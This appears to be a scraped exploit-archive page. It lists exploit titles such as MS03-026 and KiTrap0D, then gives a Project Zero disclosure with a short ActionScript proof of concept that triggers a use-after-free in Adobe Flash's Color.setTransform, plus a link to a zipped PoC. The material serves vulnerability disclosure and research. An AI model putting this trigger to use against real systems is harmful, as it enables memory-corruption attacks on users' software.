6290e0021e
8 new exploits Microsoft Windows 2000/XP - (RPC DCOM) Remote Exploit Microsoft Windows 2000/XP - (RPC DCOM) Remote Exploit (MS03-026) Microsoft Windows NT/2000/XP/2003/Vista/2008/7 - User Mode to Ring Escalation Vulnerability (KiTrap0D) Microsoft Windows NT/2000/XP/2003/Vista/2008/7 - User Mode to Ring Escalation Vulnerability (KiTrap0D) (MS10-015) PHP <= 7.0.4/5.5.33 - SNMP Format String Exploit Windows Kernel - Bitmap Use-After-Free Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read Adobe Flash - URLStream.readObject Use-After-Free Adobe Flash - TextField.maxChars Use-After-Free Android - ih264d_process_intra_mb Memory Corruption Adobe Flash - Color.setTransform Use-After-Free PHP 5.5.33 - Invalid Memory Write
25 lines
581 B
Text
Executable file
25 lines
581 B
Text
Executable file
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=451
|
|
|
|
If Color.setTransform is set to a transform that deletes the field it is called on, a UaF occurs. A PoC is as follows:
|
|
|
|
var tf:TextField = this.createTextField("tf",1,1,1,4,4)
|
|
|
|
var n = new Object();
|
|
|
|
n.valueOf = function () {
|
|
trace("here");
|
|
tf.removeTextField()
|
|
}
|
|
|
|
var o = {ra: n, rb:8};
|
|
|
|
var c = new Color(tf)
|
|
c.setTransform(o)
|
|
|
|
|
|
A sample swf and fla are attached.
|
|
|
|
|
|
Proof of Concept:
|
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39652.zip
|
|
|